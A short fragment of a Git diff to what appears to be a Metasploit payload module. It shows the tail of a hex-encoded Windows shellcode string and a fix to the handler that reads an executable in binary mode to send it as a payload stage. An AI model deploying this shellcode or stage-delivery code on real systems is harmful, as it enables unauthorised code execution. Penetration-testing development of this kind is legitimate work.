"\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\x57\x68\x75\x6E" +
|
||||
"\x4D\x61\xFF\xD5\xFF\x74\x24\x58\x68\xD7\x2E\xDD\x13\xFF\xD5\xBB" +
|
||||
"\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80" +
|
||||
"\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
|
||||
@ -73,7 +72,12 @@ module Metasploit3
|
||||
#
|
||||
def handle_connection_stage(conn)
|
||||
begin
|
||||
data = ::IO.read(datastore['PEXEC'])
|
||||
# bug fix for: data = ::IO.read(datastore['PEXEC'])
|
||||
# the above does not return the entire contents
|
||||
data = ""
|
||||
File.open( datastore['PEXEC'], "rb" ) { |f|
|
||||
data += f.read
|
||||
}
|
||||
rescue
|
||||
print_error("Failed to read executable: #{$!}")
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user